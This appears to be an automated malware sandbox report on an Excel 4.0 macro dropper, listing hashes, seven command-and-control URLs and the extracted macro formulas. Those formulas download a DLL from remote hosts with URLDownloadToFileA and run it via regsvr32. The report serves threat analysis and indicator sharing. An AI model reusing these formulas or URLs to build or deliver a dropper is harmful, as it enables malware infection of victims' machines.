General

  • Target

    a1d6c1829b28235c056139f8d03a6101c6fb1f87cd0ec20d1efdc51861559017

  • Size

    73KB

  • Sample

    241119-m46xkawapp

  • MD5

    ea6d9e9fd72fdadb35082ddb0ea22da7

  • SHA1

    60fc0032ed500c2a655469ffb4aa90a35de4b023

  • SHA256

    a1d6c1829b28235c056139f8d03a6101c6fb1f87cd0ec20d1efdc51861559017

  • SHA512

    7c8329202c8211d87e544427ad00ba09be7ff5a6023e3265243c9bc0005bf54ebc66c80c52aab2a21db3c2f570405572cfaf08fbf2da3e3dcbb15a31f4b0ffef

  • SSDEEP

    1536:EheXF/Sto0NSVUINwtzLT7OMuuAe0yOcfpXZGsMbV6Jr:EhUItzSmICpH7OZuvZGsMwr

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://onlytesting.uknowva.com/cgi-bin/ykwkwDElL7GqV/

http://alexandreinacio.com/erros/7KuhQtHTu/

http://dalmiavihar.com/Fox-C404/dogTQp57ShXI1SqA/

https://ambassadedutogo.ch/assets/MFckuq1UcuDcJR5z/

http://alugueldebrinquedos.barueri.br/cgi-bin/9yuuBqDF/

http://www.annuncivallecamonica.it/oc-content/67q/

http://hitmidia.com.br/hitcardmodelos/BZC3LBLANRJKXD6bqI/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://onlytesting.uknowva.com/cgi-bin/ykwkwDElL7GqV/","..\fbd.dll",0,0) =IF('EGVEB'!D9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://alexandreinacio.com/erros/7KuhQtHTu/","..\fbd.dll",0,0)) =IF('EGVEB'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://dalmiavihar.com/Fox-C404/dogTQp57ShXI1SqA/","..\fbd.dll",0,0)) =IF('EGVEB'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ambassadedutogo.ch/assets/MFckuq1UcuDcJR5z/","..\fbd.dll",0,0)) =IF('EGVEB'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://alugueldebrinquedos.barueri.br/cgi-bin/9yuuBqDF/","..\fbd.dll",0,0)) =IF('EGVEB'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.annuncivallecamonica.it/oc-content/67q/","..\fbd.dll",0,0)) =IF('EGVEB'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hitmidia.com.br/hitcardmodelos/BZC3LBLANRJKXD6bqI/","..\fbd.dll",0,0)) =IF('EGVEB'!D21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\fbd.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://onlytesting.uknowva.com/cgi-bin/ykwkwDElL7GqV/

xlm40.dropper

http://alexandreinacio.com/erros/7KuhQtHTu/

xlm40.dropper

http://dalmiavihar.com/Fox-C404/dogTQp57ShXI1SqA/

Targets

    • Target

      a1d6c1829b28235c056139f8d03a6101c6fb1f87cd0ec20d1efdc51861559017

    • Size

      73KB

    • MD5

      ea6d9e9fd72fdadb35082ddb0ea22da7

    • SHA1

      60fc0032ed500c2a655469ffb4aa90a35de4b023

    • SHA256

      a1d6c1829b28235c056139f8d03a6101c6fb1f87cd0ec20d1efdc51861559017

    • SHA512

      7c8329202c8211d87e544427ad00ba09be7ff5a6023e3265243c9bc0005bf54ebc66c80c52aab2a21db3c2f570405572cfaf08fbf2da3e3dcbb15a31f4b0ffef

    • SSDEEP

      1536:EheXF/Sto0NSVUINwtzLT7OMuuAe0yOcfpXZGsMbV6Jr:EhUItzSmICpH7OZuvZGsMwr

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks